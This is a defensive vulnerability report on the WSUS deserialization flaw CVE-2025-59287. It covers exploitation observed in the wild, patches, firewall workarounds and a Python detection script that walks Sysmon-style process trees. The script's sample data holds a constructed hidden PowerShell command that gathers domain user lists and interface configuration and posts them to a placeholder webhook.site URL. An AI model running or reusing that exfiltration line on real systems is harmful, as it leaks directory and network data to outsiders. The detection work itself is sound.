Full Report
Exploitation of CVE-2025-59287 began after public disclosure and the release of proof-of-concept code
Analysis Summary
# Vulnerability: Remote Code Execution in Windows Server Update Services (WSUS) Leading to Data Exfiltration
## CVE Details
- CVE ID: CVE-2025-59287
- CVSS Score: Not stated in the source material; severity is treated as **Critical** here because the flaw yields unauthenticated remote code execution and was actively exploited for data harvesting.
- CWE: CWE-502 (Deserialization of Untrusted Data)
## Affected Systems
- Products: Microsoft Windows Server Update Services (WSUS)
- Versions: Windows Server releases running the WSUS server role; the vulnerable builds are those addressed by the October 14, 2025 patch and the subsequent October 23, 2025 out-of-band update.
- Configurations: Internet-facing WSUS servers are the exposed population, in particular those publishing the default WSUS ports (TCP 8530 for HTTP and TCP 8531 for HTTPS) to the internet.
## Vulnerability Description
The vulnerability is a **critical deserialization bug** in the Windows Server Update Services (WSUS) component: untrusted serialized input reaching the WSUS web services is deserialized without adequate validation. Successful exploitation allows a remote, unauthenticated attacker to achieve Remote Code Execution (RCE) on the vulnerable server. The execution path observed in the wild was the IIS worker process hosting WSUS (`w3wp.exe`) spawning nested `cmd.exe` processes that launched PowerShell with a Base64-encoded command (the `-EncodedCommand` form, in which the script is carried as Base64 of its UTF-16LE text).
## Exploitation
- Status: **Exploited in the wild** (observed starting October 24, 2025). **PoC available** (published publicly; the public analysis and PoC preceded Microsoft's out-of-band patch).
- Complexity: **Low** (implied by the rapid wave of exploitation that followed the PoC release; no authentication or user interaction is needed).
- Attack Vector: **Network** (unauthenticated requests to the WSUS web services on internet-facing servers).
## Impact
The exploitation observed was used specifically for **data harvesting**.
- Confidentiality: **High** (Harvesting Active Directory domain user lists and network interface configurations).
- Integrity: **Medium** (Executing arbitrary code, though the initial observed payload focused on reconnaissance).
- Availability: **Low to Medium** (Potential for secondary impact depending on the further intent of the threat actor).
## Remediation
### Patches
- Microsoft released initial patches on **October 14, 2025**.
- Microsoft issued an **out-of-band security update on October 23, 2025**, subsequent to public technical analysis and the release of PoC code.
*Organizations must apply the October 23, 2025 out-of-band update (or a later cumulative update that includes it). Because Microsoft re-issued a fix after the initial release, a server that has only the October 14 patch should not be treated as protected until the newer update is confirmed installed.*
### Workarounds
- **Restrict External Access:** Immediately identify any WSUS server reachable from the internet and block inbound access to its web interfaces (TCP 8530 and 8531) at the network edge and on the host firewall, allowing only the internal clients and downstream servers that need them. WSUS should generally not be public-facing. Note that network restriction only reduces exposure; it does not remove the vulnerability for an attacker who already has internal network access, so patching remains required.
## Detection
- **Indicators of Compromise (IOCs):**
- PowerShell launched with a Base64-encoded command (`-EncodedCommand` or a short form such as `-enc`) via nested `cmd.exe` processes whose ancestor is an IIS worker process (`w3wp.exe`) on a WSUS server.
- Outbound connections from those processes that send collected system data (IP addresses, Active Directory user lists, network interface configurations) to external services, such as **Webhook.site** addresses.
- **Detection Methods and Tools:**
- Review **network, host, and application logs** for signs of unusual activity on or originating from WSUS servers.
- Monitor for anomalous process trees starting from IIS applications leading to command execution utilities.
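The following Python is an added example of the detection logic described above; it is not code from the original report or from the sources it cites. It walks constructed, Sysmon-style process-creation (EventID 1) and network-connection (EventID 3) records, flags any `cmd.exe` or PowerShell process whose ancestry includes `w3wp.exe`, decodes the `-EncodedCommand` payload (Base64 of UTF-16LE text) so the analyst can read what ran, and flags outbound connections to webhook.site. The field names (`ProcessId`, `ParentProcessId`, `Image`, `CommandLine`, `DestinationHostname`), PIDs, paths, the recon payload and the webhook.site URL are all constructed for the example and are not real indicators.

```python
import base64
from typing import Dict, List, Optional

# Constructed sample telemetry in a Sysmon-like shape (EventID 1 = process
# creation, EventID 3 = network connection).  PIDs, paths and the payload are
# illustrative; the webhook.site URL is a placeholder, not a real indicator.
W3WP = r"C:\Windows\System32\inetsrv\w3wp.exe"
CMD = r"C:\Windows\System32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"


def encode_powershell(script: str) -> str:
    """PowerShell's -EncodedCommand takes Base64 of the script's UTF-16LE bytes."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str) -> Optional[str]:
    """Inverse of encode_powershell; None if the argument is not valid Base64/UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Recon payload modelled on what the report describes (domain user list and
# interface configuration posted to webhook.site); constructed for this example.
RECON = ("$d = (net user /domain) + (ipconfig /all); "
         "Invoke-WebRequest -Uri https://webhook.site/00000000-0000-0000-0000-000000000000 "
         "-Method POST -Body ($d -join ';')")
ENC = encode_powershell(RECON)

SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 4100, "ParentProcessId": 700, "Image": W3WP,
     "CommandLine": 'w3wp.exe -ap "WsusPool"'},
    {"EventID": 1, "ProcessId": 5200, "ParentProcessId": 4100, "Image": CMD,
     "CommandLine": f"cmd.exe /c cmd.exe /c powershell -nop -w hidden -enc {ENC}"},
    {"EventID": 1, "ProcessId": 5204, "ParentProcessId": 5200, "Image": CMD,
     "CommandLine": f"cmd.exe /c powershell -nop -w hidden -enc {ENC}"},
    {"EventID": 1, "ProcessId": 5210, "ParentProcessId": 5204, "Image": PS,
     "CommandLine": f"powershell -nop -w hidden -enc {ENC}"},
    {"EventID": 3, "ProcessId": 5210, "Image": PS,
     "DestinationHostname": "webhook.site", "DestinationPort": 443},
    # Benign noise: an administrator's interactive shell, not descended from IIS.
    {"EventID": 1, "ProcessId": 6000, "ParentProcessId": 900, "Image": CMD,
     "CommandLine": "cmd.exe"},
    {"EventID": 1, "ProcessId": 6010, "ParentProcessId": 6000, "Image": PS,
     "CommandLine": "powershell -ExecutionPolicy Bypass -File .\\Get-WsusStatus.ps1"},
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
EXFIL_DOMAINS = ("webhook.site",)


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def extract_encoded_command(cmdline: str) -> Optional[str]:
    """Return the value after -EncodedCommand or any unambiguous prefix (-e, -ec, -enc ...)."""
    toks = cmdline.split()
    for i, tok in enumerate(toks[:-1]):
        t = tok.lower()
        if len(t) >= 2 and "-encodedcommand".startswith(t):
            return toks[i + 1]
    return None


def ancestry(pid: int, procs: Dict[int, dict]) -> List[str]:
    """Image basenames from the oldest ancestor we have telemetry for down to pid."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:  # 'seen' guards against PID-reuse loops
        seen.add(pid)
        chain.append(basename(procs[pid]["Image"]))
        pid = procs[pid]["ParentProcessId"]
    return chain[::-1]


def hunt(events: List[dict]) -> List[dict]:
    """Flag shells descended from w3wp.exe (decoding any -enc payload) and
    outbound connections to known exfiltration services."""
    procs = {e["ProcessId"]: e for e in events if e["EventID"] == 1}
    findings = []
    for e in events:
        if e["EventID"] == 1 and basename(e["Image"]) in SHELLS:
            chain = ancestry(e["ProcessId"], procs)
            if "w3wp.exe" in chain:
                enc = extract_encoded_command(e["CommandLine"])
                decoded = decode_encoded_command(enc) if enc else None
                findings.append({
                    "type": "iis_spawned_shell", "pid": e["ProcessId"], "chain": chain,
                    "decoded": decoded,
                    "exfil_in_payload": bool(decoded) and any(d in decoded for d in EXFIL_DOMAINS),
                })
        elif e["EventID"] == 3 and e.get("DestinationHostname", "").lower().endswith(EXFIL_DOMAINS):
            findings.append({"type": "outbound_to_exfil_service", "pid": e["ProcessId"],
                             "image": basename(e["Image"]), "dest": e["DestinationHostname"]})
    return findings


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

In production the records would come from Sysmon (EventID 1 and 3) or from Security event 4688 with command-line auditing enabled; the parent-chain walk is what separates the malicious pattern from an administrator's own `cmd.exe` to PowerShell hops, which the benign records above exercise. Decoding the payload as UTF-16LE matters: treating the Base64 output as UTF-8 yields interleaved NUL bytes and a string match on `webhook.site` or `net user /domain` would fail.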
## References
- Vendor Advisory: msrc dot microsoft dot com/update-guide/vulnerability/CVE-2025-59287
- Technical Analysis/PoC Source: hawktrace dot com/blog/CVE-2025-59287-UNAUTH
- PoC Code Location: gist dot github dot com/hawktrace/76b3ea4275a5e2191e6582bdc5a0dc8b